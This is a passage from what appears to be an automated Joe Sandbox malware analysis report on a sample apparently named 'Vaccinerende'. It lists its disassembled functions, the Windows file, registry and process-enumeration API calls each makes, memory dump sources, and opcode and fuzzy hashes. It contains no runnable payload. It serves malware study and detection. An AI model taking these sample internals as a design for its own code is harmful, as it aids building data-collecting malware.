                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$FileModuleName
                                            • String ID:
                                            • API String ID: 3859505661-0
                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                            Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                            • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                            Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                            Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                            Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                            Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                            Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                            • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004095FC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                            • String ID:
                                            • API String ID: 3655998216-0
                                            • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                            • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00445426
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                            • String ID:
                                            • API String ID: 1828521557-0
                                            • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                            • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                            Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID:
                                            • API String ID: 2081463915-0
                                            • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                            • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastRead
                                            • String ID:
                                            • API String ID: 2136311172-0
                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                            Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@
                                            • String ID:
                                            • API String ID: 1936579350-0
                                            • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                            • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
